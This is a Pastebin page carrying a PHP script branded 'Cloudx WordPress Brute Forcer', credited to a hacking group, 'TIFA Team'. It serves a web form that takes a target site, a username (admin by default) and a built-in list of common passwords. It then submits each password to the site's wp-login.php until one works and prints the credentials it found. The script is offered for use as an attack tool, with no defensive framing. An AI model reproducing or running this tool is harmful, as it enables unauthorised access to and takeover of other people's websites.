Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * @author Cloudx
- * @copyright 2013
- */
- function login($url,$user,$pass){
- $url = RemoveLastSlash($url);
- $url = str_replace(array("http://","https://","www."),"",trim($url));
- $url = "http://".$url;
- $login = $url.'/wp-login.php';
- $to = $url.'/wp-admin';
- //$data = array('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>'?????','wp-submit'=>'????','wp-submit'=>'Log In','redirect_to','redirect_to'=>$to,'testcookie'=>1);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_URL,$login);
- curl_setopt($ch,CURLOPT_POST,true);
- // curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$user."&pwd=".$pass."&wp-submit=Giri?"."&wp-submit=??????"."&wp-submit=Log In?"."&redirect_to=".$to."&testcookie=1");
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
- $result = curl_exec($ch);
- curl_close($ch);
- if(eregi('<div id="login_error">',$result)){
- return false;
- } else { return true; }
- }
- if(!isset($_GET['start'])){
- echo '
- <head>
- <meta name="keywords" content="Cloudx || WordPress Brute Forcer">
- <meta name="description" content="Cloudx || WordPress Brute Forcer">
- <title>Cloudx || WordPress Brute Forcer</title>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <link href="" rel="SHORTCUT ICON">
- <style type="text/css">
- body center center p {
- font-family: Arial, Helvetica, sans-serif;}
- </style>
- </head>
- <body bgcolor="#000000">
- <form method="POST" action="?start">
- <p align="center">
- <img border="0" src="" width="562" height="219"></p>
- <p align="center"><font color="#FFFFFF" face="Arial Black"><b><font size="5">Wordpress</font></b></font><font size="5"><font color="#FFFFFF" face="Arial Black"><b>
- Brute Forcer</b></font><font color="#FFFFFF" face="Segoe Script"> </font> </font>
- <font face="Segoe Script"><b><font size="5">
- <font color="#008000"><</font><font color="#FFFFFF"> Cloudx </font></font>
- <font size="5" color="#008000">></font></b></font></p>
- <p align="center"><font color="#FFFFFF"><font face="Arial Black">~Url
- :</font>
- </font>
- <input type="text" name="target" size="21" value=""></p>
- <p align="center"><font color="#FFFFFF"><font face="Arial Black">~UserName
- :</font></font>
- <input type="text" name="username" size="21" value="admin"></p>
- <p align="center"><font face="Arial Black" color="#FFFFFF">~Pass
- List :</font><font color="#FFFFFF" size="4">
- </font> </p>
- <p align="center"> <textarea rows="5" name="password" cols="47">123123
- 123
- 1234
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- admin123
- admin123123
- 123321
- 55555
- admin
- administrator
- 123456123456
- admin2010
- admin2011
- password
- P@ssW0rd
- !@#$%^
- !@#$%^&*(
- (*&^%$#@!
- 111111
- 222222
- 333333
- 444444
- 555555
- 666666
- 777777
- 888888
- 999999
- password123
- Password123
- Password</textarea></p>
- <p align="center"><input type="submit" value=" Brute "></p>
- <p align="center">
- </font><font face="Segoe Script" size="5" color="#C0C0C0">Powerd By: TIFA Team</font><p align="center">
- <font face="Courier New" size="2" color="#C0C0C0">
- We Are ; Cloudx | CityHunter | Mr.Ghost | The Moral | Abu-3mar | Dr.Black</font></p>
- <p align="center"><b><font color="#C0C0C0" face="Courier New">Greets to :</font><font color="#808000" face="Courier New"> </font>
- <font color="#FFFFFF" face="Courier New">Palestine
- , Syria </font></b></p>
- </center>
- </center>
- <p align="center">
- <b>
- <font size="2" face="Courier New" color="#C0C0C0">
- Contact :</font><font size="2" face="Courier New" color="#808000">
- <a style="text-decoration: none" href="">
- <font color="#FFFFFF"></font></a></font></b></p>
- <p align="center">
- <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
- </p>
- </p>
- </form>
- ';
- } else {
- $passwords = $_POST['password'];
- $username = $_POST['username'];
- $target = $_POST['target'];
- $ex = explode("\n",$passwords);
- foreach($ex as $password){
- if(login($target,$username,$password)){
- if(!url_exists($login))
- { echo '<body bgcolor="#000000">';
- echo "<p>".$url.'</font><font face="Courier New" size="5" color="#FFFFFF"> Error In Login Page Fix Url! </font><p align="center">';ob_flush();flush();break;}
- echo '<body bgcolor="#000000">';
- echo '<link href="" rel="SHORTCUT ICON">';
- echo '</font><font face="Courier New" size="5" color="#00CC00">';
- echo "Success : <br /> Target : $target/wp-login.php <br /> Username : $username <br /> Password : $password<br /><br />";
- echo '</font><font face="Segoe Script" size="5" color="#FFFFFF">Cloudx</font><p align="center">';
- echo '</font><font face="Segoe Script" size="5" color="#C0C0C0">Powerd By: TIFA Team</font><p align="center">';
- ob_flush();flush();break;
- } else
- echo '<link href="" rel="SHORTCUT ICON">';
- echo '<body bgcolor="#000000">';
- echo '</font><font face="Courier New" size="5" color="#FF0000">';
- echo "Fail : $password <br />";ob_flush();flush();
- }
- }
- function url_exists($strURL)
- {
- $resURL = curl_init();
- curl_setopt($resURL, CURLOPT_URL, $strURL);
- curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
- curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
- curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
- curl_exec ($resURL);
- $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
- curl_close ($resURL);
- if ($intReturnCode != 200){return false;}
- else{return true ;}
- }
- function filter($string)
- {
- if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
- else{return $string; }
- }
- function RemoveLastSlash($url)
- {
- if(strrpos($url, '/', -1) == strlen($url)-1)
- {return substr($url,0,strrpos($url, '/', -1));}
- else{return $url;}
- }
- ?>
Add Comment
Please, Sign In to add comment